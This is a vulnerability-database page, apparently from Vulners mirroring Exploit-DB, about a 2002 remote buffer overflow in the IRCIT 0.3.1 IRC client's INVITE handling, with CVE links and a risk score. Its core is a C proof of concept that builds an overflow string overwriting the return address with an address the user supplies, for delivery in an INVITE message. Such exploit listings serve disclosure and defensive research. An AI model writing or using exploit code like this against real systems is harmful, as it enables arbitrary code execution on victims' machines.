Lucene search
+L

Ayman Akt IRCIT 0.3.1 - Invite Message Remote Buffer Overflow

🗓️ 12 Jun 2002 00:00:00Reported by gobblesType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

IRCIT client has a remote buffer overflow vulnerability due to flawed INVITE message handling.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-1891
28 Jun 200504:00
cve
cvelist
Cvelist
CVE-2002-1891
28 Jun 200504:00
cvelist
euvd
EUVD
EUVD-2002-1870
28 Jun 200504:00
euvd
nvd
NVD
CVE-2002-1891
31 Dec 200205:00
nvd
redhatcve
RedhatCVE
CVE-2002-1891
21 May 202522:17
redhatcve
// source: https://www.securityfocus.com/bid/4998/info

IRCIT is a terminal based IRC client for Linux and Unix systems.

IRCIT contains a remote buffer overflow vulnerability. When a INVITE message is received, the supplied from user data is copied into a fixed buffer of length MAXHOSTLEN. A maliciously formatted message may overflow this buffer and execute arbitrary code as the IRCIT client.

/* GOBBLES-invite.c */

#include <stdio.h>

int
main(int argc, char **argv)
{
        char heh[175], *store;
        int i;

        if(argc == 1) exit(0);

        sscanf(argv[1], "%p", &store);
        memset(heh, 'x', sizeof(heh));
        *(long *)&heh[166] = (long)store;
        *(long *)&heh[170] = (long)store;
        heh[174] = '\0';

        fprintf(stdout, "%s", heh);
        exit(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.05008
41